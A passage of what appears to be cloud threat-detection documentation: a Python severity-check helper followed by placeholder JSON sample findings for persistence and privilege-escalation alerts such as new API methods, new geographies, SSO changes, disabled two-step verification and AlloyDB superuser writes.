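        "log_filters": [evidence_log_filter(e) for e in source_props.get("evidence", [])
                        if "sourceLogId" in e],
    }
    if detection.get("ruleName") == "iam_anomalous_grant":
        # Fixed sub-rules are checked outright; role-dependent ones come back None
        # and need the granted role looked up before the severity is confirmed.
        summary["expected_severity"] = iam_grant_severity(detection.get("subRuleName"))
    return summary


# Constructed sample in the newer shape, using the page's placeholder names.
SAMPLE_NOTIFICATION = {
    "findings": {
        "category": "Persistence: IAM Anomalous Grant",
        "severity": "HIGH",
        "access": {"principalEmail": "PRINCIPAL_EMAIL"},
    },
    "sourceProperties": {
        "detectionCategory": {"ruleName": "iam_anomalous_grant",
                              "subRuleName": "service_account_granted_sensitive_role_to_member"},
        "evidence": [{"sourceLogId": {"projectId": "PROJECT_ID", "insertId": "INSERT_ID",
                                      "timestamp": {"seconds": "1678897327", "nanos": 26483000}}}],
        "contextUris": {"mitreUri": {"url": "https://attack.mitre.org/techniques/T1078/004/"}},
    },
}
```

Comparing `expected_severity` with the `severity` the finding carries is a cheap consistency check before routing; for the two role-dependent sub-rules, look up the granted role and call iam_grant_severity with role_sensitivity and org_level set.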

Persistence: New AI API Method

{
  "findings": {
    "access": {
      "principalEmail": "PRINCIPAL_EMAIL",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": {
        "regionCode": "US"
      },
      "serviceName": "aiplatform.googleapis.com",
      "methodName": "METHOD_NAME",
      "principalSubject": "PRINCIPAL_SUBJECT",
      "serviceAccountKeyName": "SERVICE_ACCOUNT_KEY_NAME"
    },
    "assetDisplayName": "ASSET_DISPLAY_NAME",
    "assetId": "organizations/ORGANIZATION_NUMBER/assets/ASSET_ID",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Persistence: New AI API Method",
    "contacts": {
      "security": {
        "contacts": [
          {
            "email": "EMAIL_ADDRESS"
          },
          {
            "email": "EMAIL_ADDRESS"
          },
          {
            "email": "EMAIL_ADDRESS"
          }
        ]
      },
      "technical": {
        "contacts": [
          {
            "email": "EMAIL_ADDRESS"
          },
          {
            "email": "EMAIL_ADDRESS"
          },
          {
            "email": "EMAIL_ADDRESS"
          }
        ]
      }
    },
    "createTime": "2023-01-12T10:35:47.381Z",
    "database": {},
    "eventTime": "2023-01-12T10:35:47.270Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_NUMBER/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {
      "primaryTactic": "PERSISTENCE"
    },
    "muteInfo": {
      "staticMute": {
        "state": "UNDEFINED",
        "applyTime": "1970-01-01T00:00:00Z"
      }
    },
    "domains": [
      {
        "category": "AI"
      },
      {
        "category": "IDENTITY_AND_ACCESS"
      }
    ],
    "aiModel": {
      "name": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME",
      "deploymentPlatform": "VERTEX_AI"
    },
    "name": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "severity": "LOW",
    "state": "ACTIVE",
    "vulnerability": {},
    "workflowState": "NEW"
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "displayName": "projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME",
    "gcpMetadata": {
      "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
      "projectDisplayName": "PROJECT_ID",
      "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
      "parentDisplayName": "PROJECT_ID",
      "organization": "organizations/ORGANIZATION_ID"
    },
    "type": "google.aiplatform.Model",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "ai_anomalous_behavior_new_api_method"
    },
    "detectionPriority": "LOW",
    "affectedResources": [
      {
        "gcpResourceName": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME"
      },
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {
            "seconds": "1673519681",
            "nanos": 728289000
          },
          "insertId": "INSERT_ID"
        }
      }
    ],
    "properties": {
      "newApiMethod": {
        "newApiMethod": {
          "serviceName": "SERVICE_NAME",
          "methodName": "METHOD_NAME"
        },
        "principalEmail": "PRINCIPAL_EMAIL",
        "callerIp": "IP_ADDRESS",
        "callerUserAgent": "CALLER_USER_AGENT",
        "resourceContainer": "projects/PROJECT_NUMBER"
      }
    },
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/tactics/TA0003/"
      }
    }
  }
}

Persistence: New API Method

{
  "findings": {
    "access": {
      "principalEmail": "PRINCIPAL_EMAIL",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": {
        "regionCode": "US"
      },
      "serviceName": "SERVICE_NAME",
      "methodName": "METHOD_NAME",
      "principalSubject": "PRINCIPAL_SUBJECT",
      "serviceAccountKeyName": "SERVICE_ACCOUNT_KEY_NAME"
    },
    "assetDisplayName": "ASSET_DISPLAY_NAME",
    "assetId": "organizations/ORGANIZATION_NUMBER/assets/ASSET_ID",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Persistence: New API Method",
    "contacts": {
      "security": {
        "contacts": [
          {
            "email": "EMAIL_ADDRESS"
          },
          {
            "email": "EMAIL_ADDRESS"
          },
          {
            "email": "EMAIL_ADDRESS"
          }
        ]
      },
      "technical": {
        "contacts": [
          {
            "email": "EMAIL_ADDRESS"
          },
          {
            "email": "EMAIL_ADDRESS"
          },
          {
            "email": "EMAIL_ADDRESS"
          }
        ]
      }
    },
    "createTime": "2023-01-12T10:35:47.381Z",
    "database": {},
    "eventTime": "2023-01-12T10:35:47.270Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_NUMBER/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {},
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "severity": "LOW",
    "sourceDisplayName": "Event Threat Detection",
    "state": "ACTIVE",
    "vulnerability": {},
    "workflowState": "NEW"
  },
  "resource": {
    "name": "RESOURCE_NAME",
    "display_name": "RESOURCE_DISPLAY_NAME",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",
    "parent_display_name": "FOLDER_NAME",
    "type": "RESOURCE_TYPE",
    "folders": [
      {
        "resourceFolderDisplayName": "FOLDER_NAME",
        "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER"
      }
    ]
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "technique": "persistence",
      "indicator": "audit_log",
      "ruleName": "anomalous_behavior",
      "subRuleName": "new_api_method"
    },
    "detectionPriority": "LOW",
    "affectedResources": [
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {
            "seconds": "1673519681",
            "nanos": 728289000
          },
          "insertId": "INSERT_ID"
        }
      }
    ],
    "properties": {
      "newApiMethod": {
        "newApiMethod": {
          "serviceName": "SERVICE_NAME",
          "methodName": "METHOD_NAME"
        },
        "principalEmail": "PRINCIPAL_EMAIL",
        "callerIp": "IP_ADDRESS",
        "callerUserAgent": "CALLER_USER_AGENT",
        "resourceContainer": "projects/PROJECT_NUMBER"
      }
    },
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/tactics/TA0003/"
      }
    }
  }
}

Persistence: New Geography

This finding isn't available for project-level activations.

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//k8s.io/coordination.k8s.io/v1/namespaces/kube-node-lease/leases/gke-cscc-security-tools-default-pool-7c5d7b59-bn2h",
    "state": "ACTIVE",
    "category": "Persistence: New Geography",
    "sourceProperties": {
      "sourceId": {
        "projectNumber": "PROJECT_NUMBER",
        "customerOrganizationNumber": "ORGANIZATION_ID"
      },
      "detectionCategory": {
        "technique": "persistence",
        "indicator": "audit_log",
        "ruleName": "iam_anomalous_behavior",
        "subRuleName": "ip_geolocation"
      },
      "detectionPriority": "LOW",
      "affectedResources": [
        { "gcpResourceName": "RESOURCE_NAME" },
        { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
      ],
      "evidence": [
        {
          "sourceLogId": {
            "projectId": "PROJECT_ID",
            "resourceContainer": "projects/PROJECT_ID",
            "timestamp": {
              "seconds": "1617994703",
              "nanos": 5.08853E8
            },
            "insertId": "INSERT_ID"
          }
        }
      ],
      "properties": {
        "anomalousLocation": {
          "anomalousLocation": "BE",
          "callerIp": "IP_ADDRESS",
          "principalEmail": "PRINCIPAL_EMAIL",
          "notSeenInLast": "2592000s",
          "typicalGeolocations": [
            { "country": { "identifier": "US" } }
          ]
        }
      },
      "findingId": "FINDING_ID",
      "contextUris": {
        "mitreUri": {
          "displayName": "MITRE Link",
          "url": "https://attack.mitre.org/techniques/T1078/004/"
        },
        "cloudLoggingQueryUri": [
          {
            "displayName": "Cloud Logging Query Link",
            "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-04-09T18:58:23.508853Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%22PROJECT_ID%22?project\u003dPROJECT_ID"
          }
        ]
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-04-09T18:59:43.860Z",
    "createTime": "2021-04-09T18:59:44.440Z",
    "severity": "LOW",
    "workflowState": "NEW",
    "canonicalName": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID"
  },
  "resource": {
    "name": "RESOURCE_NAME"
  }
}

Persistence: New Geography for AI Service

This finding isn't available for project-level activations.

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME",
    "state": "ACTIVE",
    "category": "Persistence: New Geography for AI Service",
    "serviceName": "aiplatform.googleapis.com",
    "methodName": "METHOD_NAME",
    "mitreAttack": {
      "primaryTactic": "PERSISTENCE",
      "primaryTechniques": [
        "CLOUD_ACCOUNTS"
      ]
    },
    "domains": [
      { "category": "AI" },
      { "category": "IDENTITY_AND_ACCESS" }
    ],
    "aiModel": {
      "name": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME",
      "deploymentPlatform": "VERTEX_AI"
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-04-09T18:59:43.860Z",
    "createTime": "2021-04-09T18:59:44.440Z",
    "severity": "LOW",
    "workflowState": "NEW",
    "canonicalName": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID"
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "displayName": "projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME",
    "gcpMetadata": {
      "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
      "projectDisplayName": "PROJECT_ID",
      "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
      "parentDisplayName": "PROJECT_ID",
      "organization": "organizations/ORGANIZATION_ID"
    },
    "type": "google.aiplatform.Model",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_ID"
    },
    "detectionCategory": {
      "ruleName": "ai_iam_anomalous_behavior_ip_geolocation"
    },
    "detectionPriority": "MEDIUM",
    "affectedResources": [
      { "gcpResourceName": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME" },
      { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {
            "seconds": "1675913160",
            "nanos": 929341814
          },
          "insertId": "o5ii7hddddd"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1078/004/"
      }
    }
  }
}

Persistence: New User Agent

This finding isn't available for project-level activations.

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//monitoring.googleapis.com/projects/PROJECT_ID",
    "state": "ACTIVE",
    "category": "Persistence: New User Agent",
    "sourceProperties": {
      "sourceId": {
        "projectNumber": "PROJECT_NUMBER",
        "customerOrganizationNumber": "ORGANIZATION_ID"
      },
      "detectionCategory": {
        "technique": "persistence",
        "indicator": "audit_log",
        "ruleName": "iam_anomalous_behavior",
        "subRuleName": "user_agent"
      },
      "detectionPriority": "LOW",
      "affectedResources": [
        { "gcpResourceName": "//monitoring.googleapis.com/projects/PROJECT_ID" },
        { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
      ],
      "evidence": [
        {
          "sourceLogId": {
            "projectId": "PROJECT_ID",
            "resourceContainer": "projects/PROJECT_ID",
            "timestamp": {
              "seconds": "1614736482",
              "nanos": 9.76209552E8
            },
            "insertId": "INSERT_ID"
          }
        }
      ],
      "properties": {
        "anomalousSoftware": {
          "anomalousSoftwareClassification": ["USER_AGENT"],
          "behaviorPeriod": "2592000s",
          "callerUserAgent": "USER_AGENT",
          "principalEmail": "USER_EMAIL@PROJECT_ID.iam.gserviceaccount.com"
        }
      },
      "findingId": "FINDING_ID",
      "contextUris": {
        "cloudLoggingQueryUri": [
          {
            "displayName": "Cloud Logging Query Link",
            "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-03-03T01:54:42.976209552Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%22PROJECT_ID%22?project\u003dPROJECT_ID"
          }
        ]
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-03-03T01:54:47.681Z",
    "createTime": "2021-03-03T01:54:49.154Z",
    "severity": "HIGH",
    "workflowState": "NEW",
    "canonicalName": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID"
  },
  "resource": {
    "name": "//monitoring.googleapis.com/projects/PROJECT_ID"
  }
}

Persistence: SSO Enablement Toggle

This finding isn't available for project-level activations.

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//admin.googleapis.com/organizations/ORGANIZATION_ID/domainSettings",
    "state": "ACTIVE",
    "category": "Persistence: SSO Enablement Toggle",
    "sourceProperties": {
      "sourceId": {
        "organizationNumber": "ORGANIZATION_ID",
        "customerOrganizationNumber": "ORGANIZATION_ID"
      },
      "detectionCategory": {
        "technique": "account_manipulation",
        "indicator": "audit_log",
        "ruleName": "sso_enablement_toggle"
      },
      "detectionPriority": "HIGH",
      "affectedResources": [
        { "gcpResourceName": "//admin.googleapis.com/organizations/ORGANIZATION_ID/domainSettings" },
        { "gcpResourceName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID" }
      ],
      "evidence": [
        {
          "sourceLogId": {
            "projectId": "0",
            "resourceContainer": "organizations/ORGANIZATION_ID",
            "timestamp": {
              "seconds": "1622829313",
              "nanos": 3.42104E8
            },
            "insertId": "INSERT_ID"
          }
        }
      ],
      "properties": {
        "serviceName": "admin.googleapis.com",
        "methodName": "google.admin.AdminService.toggleSsoEnabled",
        "ssoState": "ENABLED",
        "domainName": "ORGANIZATION_NAME"
      },
      "contextUris": {
        "mitreUri": {
          "displayName": "MITRE Link",
          "url": "https://attack.mitre.org/techniques/T1098/"
        },
        "cloudLoggingQueryUri": [
          {
            "displayName": "Cloud Logging Query Link",
            "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-06-04T17:55:13.342104Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%220%22?project\u003d0"
          }
        ],
        "workspacesUri": {
          "displayName": "Workspaces Link",
          "url": "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#TOGGLE_SSO_ENABLED"
        }
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-06-04T17:55:13.342Z",
    "createTime": "2021-06-04T17:55:15.900Z",
    "severity": "HIGH",
    "workflowState": "NEW",
    "canonicalName": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "findingClass": "THREAT"
  },
  "resource": {
    "name": "//admin.googleapis.com/organizations/ORGANIZATION_ID/domainSettings"
  }
}

Persistence: SSO Settings Changed

This finding isn't available for project-level activations.

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//admin.googleapis.com/organizations/ORGANIZATION_ID/domainSettings",
    "state": "ACTIVE",
    "category": "Persistence: SSO Settings Changed",
    "sourceProperties": {
      "sourceId": {
        "organizationNumber": "ORGANIZATION_ID",
        "customerOrganizationNumber": "ORGANIZATION_ID"
      },
      "detectionCategory": {
        "technique": "account_manipulation",
        "indicator": "audit_log",
        "ruleName": "sso_settings_changed"
      },
      "detectionPriority": "HIGH",
      "affectedResources": [
        { "gcpResourceName": "//admin.googleapis.com/organizations/ORGANIZATION_ID/domainSettings" },
        { "gcpResourceName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID" }
      ],
      "evidence": [
        {
          "sourceLogId": {
            "projectId": "0",
            "resourceContainer": "organizations/ORGANIZATION_ID",
            "timestamp": {
              "seconds": "1621624109",
              "nanos": 3.73721E8
            },
            "insertId": "INSERT_ID"
          }
        }
      ],
      "properties": {
        "serviceName": "admin.googleapis.com",
        "methodName": "google.admin.AdminService.changeSsoSettings",
        "domainName": "ORGANIZATION_NAME"
      },
      "contextUris": {
        "mitreUri": {
          "displayName": "MITRE Link",
          "url": "https://attack.mitre.org/techniques/T1098/"
        },
        "cloudLoggingQueryUri": [
          {
            "displayName": "Cloud Logging Query Link",
            "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-05-21T19:08:29.373721Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%220%22?project\u003d0"
          }
        ],
        "workspacesUri": {
          "displayName": "Workspaces Link",
          "url": "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#CHANGE_SSO_SETTINGS"
        }
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-05-21T19:08:29.373Z",
    "createTime": "2021-05-27T11:36:24.429Z",
    "severity": "HIGH",
    "workflowState": "NEW",
    "canonicalName": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "findingClass": "THREAT"
  },
  "resource": {
    "name": "//admin.googleapis.com/organizations/ORGANIZATION_ID/domainSettings"
  }
}

Persistence: Strong Authentication Disabled

This finding isn't available for project-level activations.

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//admin.googleapis.com/organizations/ORGANIZATION_ID/securitySettings",
    "state": "ACTIVE",
    "category": "Persistence: Strong Authentication Disabled",
    "sourceProperties": {
      "sourceId": {
        "organizationNumber": "ORGANIZATION_ID",
        "customerOrganizationNumber": "ORGANIZATION_ID"
      },
      "detectionCategory": {
        "technique": "impair_defenses",
        "indicator": "audit_log",
        "ruleName": "enforce_strong_authentication"
      },
      "detectionPriority": "MEDIUM",
      "affectedResources": [
        { "gcpResourceName": "//admin.googleapis.com/organizations/ORGANIZATION_ID/securitySettings" },
        { "gcpResourceName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID" }
      ],
      "evidence": [
        {
          "sourceLogId": {
            "resourceContainer": "organizations/ORGANIZATION_ID",
            "timestamp": {
              "seconds": "1623952110",
              "nanos": 6.51337E8
            },
            "insertId": "INSERT_ID"
          }
        }
      ],
      "properties": {
        "serviceName": "admin.googleapis.com",
        "methodName": "google.admin.AdminService.enforceStrongAuthentication",
        "principalEmail": "PRINCIPAL_EMAIL"
      },
      "contextUris": {
        "mitreUri": {
          "displayName": "MITRE Link",
          "url": "https://attack.mitre.org/techniques/T1562/"
        },
        "cloudLoggingQueryUri": [
          {
            "displayName": "Cloud Logging Query Link",
            "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-06-17T17:48:30.651337Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%22%22?project\u003d"
          }
        ],
        "workspacesUri": {
          "displayName": "Workspaces Link",
          "url": "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION"
        }
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-06-17T17:48:30.651Z",
    "createTime": "2021-06-17T17:48:33.574Z",
    "severity": "MEDIUM",
    "workflowState": "NEW",
    "canonicalName": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "findingClass": "THREAT"
  },
  "resource": {
    "name": "//admin.googleapis.com/organizations/ORGANIZATION_ID/securitySettings"
  }
}

Persistence: Two Step Verification Disabled

This finding isn't available for project-level activations.

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//login.googleapis.com/organizations/ORGANIZATION_ID",
    "state": "ACTIVE",
    "category": "Persistence: Two Step Verification Disabled",
    "sourceProperties": {
      "sourceId": {
        "organizationNumber": "ORGANIZATION_ID",
        "customerOrganizationNumber": "ORGANIZATION_ID"
      },
      "detectionCategory": {
        "technique": "impair_defenses",
        "indicator": "audit_log",
        "ruleName": "two_step_verification_disabled"
      },
      "detectionPriority": "LOW",
      "affectedResources": [
        { "gcpResourceName": "//login.googleapis.com/organizations/ORGANIZATION_ID" },
        { "gcpResourceName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID" }
      ],
      "evidence": [
        {
          "sourceLogId": {
            "resourceContainer": "organizations/ORGANIZATION_ID",
            "timestamp": {
              "seconds": "1626391356",
              "nanos": 5.96E8
            },
            "insertId": "INSERT_ID"
          }
        }
      ],
      "properties": {
        "serviceName": "login.googleapis.com",
        "methodName": "google.login.LoginService.2svDisable",
        "ssoState": "UNKNOWN",
        "principalEmail": "PRINCIPAL_EMAIL"
      },
      "contextUris": {
        "mitreUri": {
          "displayName": "MITRE Link",
          "url": "https://attack.mitre.org/techniques/T1556/006/"
        },
        "cloudLoggingQueryUri": [
          {
            "displayName": "Cloud Logging Query Link",
            "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-07-15T23:22:36.596Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%22%22?project\u003d"
          }
        ],
        "workspacesUri": {
          "displayName": "Workspaces Link",
          "url": "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/login#2sv_disable"
        }
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-07-15T23:22:36.596Z",
    "createTime": "2021-07-15T23:22:40.079Z",
    "severity": "LOW",
    "workflowState": "NEW",
    "canonicalName": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "findingClass": "THREAT",
    "indicator": {}
  },
  "resource": {
    "name": "//login.googleapis.com/organizations/ORGANIZATION_ID"
  }
}

Privilege Escalation: AlloyDB Database Superuser Writes to User Tables

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resource_name": "//alloydb.googleapis.com/projects/PROJECT_ID/locations/REGION/clusters/CLUSTER/instances/INSTANCE_NAME",
    "state": "ACTIVE",
    "category": "Privilege Escalation: AlloyDB Database Superuser Writes to User Tables",
    "sourceProperties": {
      "sourceId": {
        "projectNumber": "PROJECT_NUMBER",
        "customerOrganizationNumber": "ORGANIZATION_ID"
      },
      "detectionCategory": {
        "ruleName": "alloydb_user_granted_all_permissions"
      },
      "detectionPriority": "LOW",
      "affectedResources": [
        { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" },
        { "gcpResourceName": "//alloydb.googleapis.com/projects/PROJECT_ID/locations/REGION/clusters/CLUSTER/instances/INSTANCE_NAME" }
      ],
      "evidence": [
        {
          "sourceLogId": {
            "projectId": "PROJECT_ID",
            "resourceContainer": "projects/PROJECT_ID",
            "timestamp": {
              "seconds": "0",
              "nanos": 0.0
            },
            "insertId": "INSERT_ID"
          }
        }
      ],
      "findingId": "FINDING_ID",
      "contextUris": {
        "mitreUri": {
          "displayName": "MITRE Link",
          "url": "https://attack.mitre.org/techniques/T1078/001/"
        },
        "cloudLoggingQueryUri": [
          {
            "displayName": "Cloud Logging Query Link",
            "url": "LOGGING_LINK"
          }
        ]
      }
    },
    "eventTime": "EVENT_TIMESTAMP",
    "createTime": "CREATE_TIMESTAMP",
    "severity": "LOW",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "mute": "UNDEFINED",
    "findingClass": "THREAT",
    "mitreAttack": {
      "primaryTactic": "PRIVILEGE_ESCALATION",
      "primaryTechniques": [
        "VALID_ACCOUNTS"
      ],
      "additionalTactics": [
        "PERSISTENCE"
      ],
      "additionalTechniques": [
        "ACCOUNT_MANIPULATION"
      ]
    },
    "database": {
      "displayName": "DATABASE_NAME",
      "userName": "USER_NAME",
      "query": "QUERY"
    },
    "access": {
      "serviceName": "alloydb.googleapis.com",
      "methodName": "alloydb.instances.query"
    }
  },
  "resource": {
    "name": "//alloydb.googleapis.com/projects/PROJECT_ID/locations/REGION/clusters/CLUSTER/instances/INSTANCE_NAME",
    "displayName": "projects/PROJECT_ID/locations/REGION/clusters/CLUSTER/instances/INSTANCE_NAME",
    "type": "google.alloydb.Instance",
    "cloudProvider": "GOOGLE_CLOUD_PLATFORM",
    "service": "alloydb.googleapis.com",
    "location": "REGION",
    "gcpMetadata": {
      "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
      "projectDisplayName": "PROJECT_ID",
      "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
      "parentDisplayName": "PROJECT_ID",
      "folders": [
        {
          "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",
          "resourceFolderDisplayName": "FOLDER_NAME"
        }
      ],
      "organization": "organizations/ORGANIZATION_ID"
    },
    "resourcePath": {
      "nodes": [
        {
          "nodeType": "GCP_PROJECT",
          "id": "projects/PROJECT_NUMBER",
          "displayName": "PROJECT_ID"
        },
        {
          "nodeType": "GCP_FOLDER",
          "id": "folders/FOLDER_NUMBER",
          "displayName": "FOLDER_NAME"
        },
        {
          "nodeType": "GCP_ORGANIZATION",
          "id": "organizations/ORGANIZATION_ID"
        }
      ]
    },
    "resourcePathString": "organizations/ORGANIZATION_ID/folders/FOLDER_NUMBER/projects/PROJECT_NUMBER"
  }
}

Privilege Escalation: AlloyDB Over-Privileged Grant

{
  "finding": {
